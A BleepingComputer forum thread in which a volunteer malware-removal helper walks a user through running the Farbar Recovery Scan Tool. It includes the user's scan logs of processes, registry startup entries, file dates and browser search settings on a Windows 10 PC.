2016-01-10 15:27 - 2016-01-10 15:27 - 00001646 _____ C:\Users\sesay\Desktop\Store.lnk
2016-01-03 13:04 - 2016-01-03 13:04 - 00001829 _____ C:\Users\Public\Desktop\iTunes.lnk
2016-01-03 13:04 - 2016-01-03 13:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iTunes
2016-01-03 13:03 - 2016-01-03 13:04 - 00000000 ____D C:\Program Files\iTunes
2016-01-03 13:03 - 2016-01-03 13:03 - 00000000 ____D C:\Program Files\iPod
2016-01-03 13:03 - 2016-01-03 13:03 - 00000000 ____D C:\Program Files (x86)\iTunes
2016-01-03 13:00 - 2016-01-03 13:00 - 00001921 _____ C:\Users\Public\Desktop\QuickTime Player.lnk
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\iCloud
2016-01-03 13:00 - 2016-01-03 13:00 - 00000000 ____D C:\Program Files (x86)\QuickTime
2016-01-03 12:59 - 2016-01-03 12:59 - 00000000 ____D C:\Users\sesay\AppData\Roaming\WildTangent
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2016-01-27 17:53 - 2015-08-16 21:31 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Skype
2016-01-27 17:46 - 2015-11-08 19:36 - 00000930 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job
2016-01-27 17:46 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\AppReadiness
2016-01-27 17:46 - 2015-08-16 16:54 - 00000000 ____D C:\Users\sesay\AppData\Local\Packages
2016-01-27 16:47 - 2015-08-16 20:00 - 00001137 _____ C:\Users\sesay\Desktop\nativelog.txt
2016-01-27 15:46 - 2015-11-08 19:36 - 00000926 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job
2016-01-27 15:11 - 2015-10-30 02:11 - 00000000 ____D C:\WINDOWS\CbsTemp
2016-01-27 11:39 - 2015-12-23 09:06 - 00000000 ____D C:\Users\sesay\AppData\Local\Screencast-O-Matic-v2
2016-01-27 11:34 - 2015-11-17 17:45 - 00000000 ____D C:\Program Files (x86)\Steam
2016-01-27 11:28 - 2015-10-30 02:24 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-27 11:24 - 2015-08-16 16:58 - 00000000 ____D C:\Users\sesay\Documents\Youcam
2016-01-27 11:22 - 2015-12-07 03:53 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2016-01-27 11:22 - 2015-08-16 16:57 - 00000000 ___RD C:\Users\sesay\OneDrive
2016-01-27 11:22 - 2015-08-16 16:54 - 00000000 __SHD C:\Users\sesay\IntelGraphicsProfiles
2016-01-26 21:52 - 2015-11-17 17:56 - 00000000 ____D C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2016-01-26 20:01 - 2015-08-16 17:00 - 00000000 ____D C:\Users\sesay\AppData\Roaming\.minecraft
2016-01-26 14:10 - 2015-08-16 21:31 - 00000000 ____D C:\ProgramData\Skype
2016-01-25 17:26 - 2015-09-01 18:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2016-01-25 17:25 - 2015-09-01 18:47 - 00000000 ____D C:\Program Files\Java
2016-01-25 17:21 - 2015-08-16 17:03 - 00000000 ____D C:\Users\sesay\AppData\Roaming\InstallShield Installation Information
2016-01-25 17:20 - 2015-11-26 21:57 - 00000000 ____D C:\ProgramData\SkySaga Infinite Isles
2016-01-25 17:19 - 2015-02-11 23:22 - 00000000 ____D C:\ProgramData\Package Cache
2016-01-25 17:18 - 2015-10-30 02:21 - 00000000 ____D C:\WINDOWS\INF
2016-01-23 17:26 - 2015-12-18 19:47 - 00000000 ____D C:\Users\sesay\AppData\Local\Gameo
2016-01-23 14:49 - 2015-11-08 19:35 - 00000000 ____D C:\Users\sesay\AppData\Local\Google
2016-01-22 15:50 - 2015-11-08 19:36 - 00002355 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-01-22 15:50 - 2015-11-08 19:36 - 00002343 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-01-22 15:20 - 2015-09-01 18:47 - 00000000 ____D C:\Users\sesay\.oracle_jre_usage
2016-01-22 11:50 - 2015-12-07 03:53 - 00012493 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
2016-01-22 11:50 - 2015-12-07 03:53 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2016-01-21 11:19 - 2015-09-01 18:47 - 00000000 ____D C:\ProgramData\Oracle
2016-01-21 11:18 - 2015-09-01 18:47 - 00110176 _____ (Oracle Corporation) C:\WINDOWS\system32\WindowsAccessBridge-64.dll
2016-01-21 08:51 - 2015-10-30 02:24 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-01-21 08:48 - 2015-08-18 20:17 - 00000000 ____D C:\Program Files\Microsoft Office 15
2016-01-15 00:24 - 2015-08-14 18:25 - 03309264 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkApi64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 03075784 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RltkAPO64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00950600 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00731088 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00461272 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
2016-01-15 00:24 - 2015-08-14 18:25 - 00203432 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCfg64.dll
2016-01-15 00:20 - 2015-08-14 18:24 - 04695288 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\Drivers\RTKVHD64.sys
2016-01-15 00:20 - 2015-08-14 18:24 - 00032392 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtkCoLDR64.dll
2016-01-14 23:37 - 2015-12-07 06:46 - 00000000 ____D C:\Windows.old
2016-01-14 08:39 - 2015-12-07 03:57 - 00972104 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2016-01-14 08:35 - 2015-12-07 04:20 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2016-01-13 23:10 - 2015-08-16 16:52 - 00016764 _____ C:\bdlog.txt
2016-01-13 23:09 - 2015-10-30 02:24 - 00000000 ____D C:\WINDOWS\system32\appraiser
2016-01-13 23:05 - 2015-09-16 18:55 - 00000000 ___RD C:\Users\sesay\3D Objects
2016-01-13 21:43 - 2015-08-16 18:55 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-01-13 21:40 - 2015-08-16 18:55 - 143671360 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2016-01-13 21:31 - 2015-08-16 21:31 - 00000000 ___RD C:\Program Files (x86)\Skype
2016-01-03 13:09 - 2015-12-06 19:46 - 00000000 ____D C:\Users\sesay\AppData\Local\Apple Computer
2016-01-03 13:03 - 2015-12-06 19:45 - 00000000 ____D C:\Program Files\Common Files\Apple
2016-01-02 20:40 - 2015-10-30 02:26 - 00826872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2016-01-02 20:40 - 2015-10-30 02:26 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-30 15:30 - 2015-12-07 03:57 - 00000000 ____D C:\Users\hakim
 
==================== Files in the root of some directories =======
 
2015-08-16 12:09 - 2015-08-16 12:09 - 0509256 _____ () C:\ProgramData\1439744800.bdinstall.bin
 
Some files in TEMP:
====================
C:\Users\sesay\AppData\Local\Temp\jre-8u66-windows-au.exe
C:\Users\sesay\AppData\Local\Temp\jre-8u71-windows-au.exe
 

==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 

ATTENTION: ==> Could not access BCD. The user is not administrator
 
==================== End of FRST.txt ============================

 
 
Thank you very much

Attached Files


Edited by Oh My!, 29 January 2016 - 07:02 PM.


BC AdBot (Login to Remove)

 


#2 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,957 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:10:42 PM

Posted 29 January 2016 - 07:01 PM

Greetings Alban18 and :welcome: to BleepingComputer's Virus/Trojan/Spyware/Malware Removal forum.

My name is Oh My! and I am here to help you! Now that we are "friends" please call me Gary.

If you would allow me to call you by your first name I would prefer to do that.

===================================================

Ground Rules:
  • First, I would like to inform you that most of us here at Bleeping Computer offer our expert assistance out of the goodness of our hearts. Please try to match our commitment to you with your patience toward us. If this was easy we would never have met.
  • Please do not run any tools or take any steps other than those I will provide for you while we work on your computer together. I need to be certain about the state of your computer in order to provide appropriate and effective steps for you to take. Most often "well intentioned" (and usually panic driven!) independent efforts can make things much worse for both of us. If at any point you would prefer to take your own steps please let me know, I will not be offended. I would be happy to focus on the many others who are waiting in line for assistance.
  • Please perform all steps in the order they are listed in each set of instructions. Some steps may be a bit complicated. If things are not clear, be sure to stop and let me know. We need to work on this together with confidence.
  • Please copy and paste all logs into your post unless directed otherwise. Please do not re-run any programs I suggest. If you encounter problems simply stop and tell me.
  • When you post your reply, use the Replytopic.jpg button instead.
  • In the upper right hand corner of the topic you will see the Followtopic.jpg button. Click on this then choose Immediate E-Mail notification and then Proceed and you will be sent an email once I have posted a response.
  • If you do not reply to your topic after 5 days we assume it has been abandoned and I will close it.
  • When your computer is clean I will alert you of such. I will also provide for you detailed information about how you can combat future infections.
  • I would like to remind you to make no further changes to your computer unless I direct you to do so.
===================================================

Now that I am assisting you, you can expect that I will be very responsive to your situation. If you are able, I would request you check this thread at least once per day so that we can try to resolve your issues effectively and efficiently. If you are going to be delayed please be considerate and post that information so that I know you are still with me. Unfortunately, there are many people waiting to be assisted and not enough of us at BleepingComputer to go around. I appreciate your understanding and diligence.

Thank you for your patience thus far.

Please do this.

===================================================

Farbar Recovery Scan Tool (FRST)

--------------------
  • Delete your existing copy of FRST.exe
  • Download Farbar Recover Scan Tool for either 32 bit or 64 bit systems and save it to your desktop <<< Important
  • If you are unsure if you have 32 bit or 64 bit simply download and try one. If that doesn't run properly the other one should
  • Right click the icon and select Run as administrator
  • Click Yes to the disclaimer
  • Make sure the Addition.txt box is checked
  • Click Scan and allow the program to run
  • Click OK on the Scan complete screen, then OK on the Addition.txt pop up screen
  • 2 Notepad documents should now be open on your desktop.
  • Please copy and paste the contents of both in your reply
===================================================

System Summary Information

--------------------
  • Press the windows key Windows_Logo_key.gif + r on your keyboard at the same time
  • Type msinfo32 and press Enter
  • Left click on System Summary
  • Click File, Save, and name the file Summary
  • Zip and attach the file to your reply
===================================================

Things I would like to see in your next reply. Please be sure to copy and paste any requested log information unless you are asked to attach it. :thumbsup2:
  • FRST results
  • Addition log
  • System Summary Information

Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#3 Alban18

Alban18
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:01:42 AM

Posted 31 January 2016 - 01:14 PM

Sorry for the late response, I'll make sure to check this everyday from now.

I will do this task when I go to my uncle's house today.



#4 Oh My!

Oh My!

    Adware and Spyware and Malware.....


  • Malware Response Instructor
  • 37,957 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:California
  • Local time:10:42 PM

Posted 31 January 2016 - 03:44 PM

Thanks.
Gary
 
If I do not reply within 24 hours please send me a Personal Message.

"Lord, to whom would we go? You have the words that give eternal life. We believe, and we know you are the Holy One of God."

#5 Alban18

Alban18
  • Topic Starter

  • Members
  • 34 posts
  • OFFLINE
  •  
  • Local time:01:42 AM

Posted 31 January 2016 - 08:27 PM

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
Ran by MuhammadAkim (administrator) on BASEMENT-PC (31-01-2016 19:56:24)
Running from C:\Users\sesay\Desktop
Loaded Profiles: MuhammadAkim & abang & sesay (Available Profiles: MuhammadAkim & abang & sesay & hakim)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Edge)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\vsserv.exe
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Intel Corporation) C:\Windows\SysWOW64\SET8596.tmp
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Broadcom Corporation.) C:\Windows\System32\BtwRSupportService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\updatesrv.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Program Files\WindowsApps\Microsoft.WindowsStore_2015.25.24.0_x64__8wekyb3d8bbwe\WinStore.Mobile.exe
(Microsoft Corporation) C:\Windows\System32\LogonUI.exe
(Microsoft Corporation) C:\Windows\System32\LockAppHost.exe
() C:\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\LockApp.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersServer.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Bitdefender) C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE15\CSISYNCCLIENT.EXE
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Hi-Rez Studios) C:\Program Files (x86)\Hi-Rez Studios\HiPatchService.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8790264 2016-01-15] (Realtek Semiconductor)
HKLM\...\Run: [Bdagent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe [1603544 2015-11-11] (Bitdefender)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-12-17] (Apple Inc.)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-12-22] (Oracle Corporation)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\Run: [Bitdefender Wallet Agent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe [790880 2015-11-11] (Bitdefender)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [50615936 2016-01-18] (Skype Technologies S.A.)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3013712 2015-12-14] (Valve Corporation)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\Run: [GoogleChromeAutoLaunch_0635AB9B70CF1FCB8E6453354609F798] => C:\Users\MuhammadAkim\AppData\Local\Chromium\Application\chrome.exe [667136 2015-08-11] (The Chromium Authors)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\...\RunOnce: [Uninstall C:\Users\MuhammadAkim\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\MuhammadAkim\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\amd64"
HKU\S-1-5-21-1436452318-2580999886-2786755032-1002\...\Run: [Bitdefender Wallet Agent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe [790880 2015-11-11] (Bitdefender)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1002\...\RunOnce: [Uninstall C:\Users\abang\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\abang\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64"
HKU\S-1-5-21-1436452318-2580999886-2786755032-1002\...\RunOnce: [Uninstall C:\Users\abang\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\abang\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1"
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [Bitdefender Wallet Agent] => C:\Program Files\Bitdefender\Bitdefender 2015\bdwtxag.exe [790880 2015-11-11] (Bitdefender)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [Gameo] => C:\Users\sesay\AppData\Roaming\Gameo\gameo.exe [42482176 2015-07-04] ()
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [GoogleChromeAutoLaunch_F360403BC2EC98CA32D7EC0F47FB7B5E] => C:\Users\sesay\AppData\Local\Chromium\Application\chrome.exe [667136 2015-08-11] (The Chromium Authors)
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [NowUSeeIt Player] => "C:\Program Files (x86)\NowUSeeItPlayer\NowUSeeItPlayer.exe" /autostart=1
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\Run: [msnmsgr] => "C:\Program Files (x86)\Windows Live\Messenger\msnmsgr.exe" /background
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\...\RunOnce: [Uninstall C:\Users\sesay\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\sesay\AppData\Local\Microsoft\OneDrive\17.3.6201.1019_1\amd64"
ShellIconOverlayIdentifiers: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX64.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtPending] -> {056D528D-CE28-4194-9BA3-BA2E9197FF8C} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSynced] -> {05B38830-F4E9-4329-978B-1DD28605D202} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
ShellIconOverlayIdentifiers-x32: [###MegaShellExtSyncing] -> {0596C850-7BDD-4C9D-AFDF-873BE6890637} => C:\Users\sesay\AppData\Local\MEGAsync\ShellExtX32.dll No File
Startup: C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Curse.lnk [2016-01-21]
ShortcutTarget: Curse.lnk -> C:\Users\MuhammadAkim\AppData\Roaming\Curse Client\Bin\Curse.exe (No File)
Startup: C:\Users\sesay\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MEGAsync.lnk [2016-01-22]
ShortcutTarget: MEGAsync.lnk -> C:\Users\MuhammadAkim\AppData\Local\MEGAsync\MEGAsync.exe (No File)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{7a5d4b11-e3c0-473f-8cb1-6ef96b29487a}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{ec741dab-2cfc-4a75-94f0-0a77b7af259e}: [DhcpNameServer] 192.168.1.1
 
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = 
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = 
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-1436452318-2580999886-2786755032-1001\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://mystart.toshiba.com/
HKU\S-1-5-21-1436452318-2580999886-2786755032-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/p/?LinkId=619797&pc=UE01&ocid=UE01DHP
HKU\S-1-5-21-1436452318-2580999886-2786755032-1003\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.live.com/1rewlive4startup/home
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_omxmedia_15_52_ssg03&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzz0CyDtCyByD0B0A0B0DtN0D0Tzu0StCyEyDtCtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2StD0Fzy0FyBzy0DzztGyE0F0F0CtGtByDtD0EtGyByC0F0EtGtCzyyEtDtB0AtDyEtDtByEyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SzzyCzz0FyCtA0D0CtG0Bzz0E0BtGyE0D0B0EtGzzyEtCzztGyEtC0ByB0A0ByB0CyCyDtA0E2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D2082660329%26a%3Dwbf_omxmedia_15_52_ssg03%26os_ver%3D10.0%26os%3DWindows%2B10%2BHome&p={searchTerms}
SearchScopes: HKLM -> {29DAFA99-4299-408B-A085-18B288E65C09} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
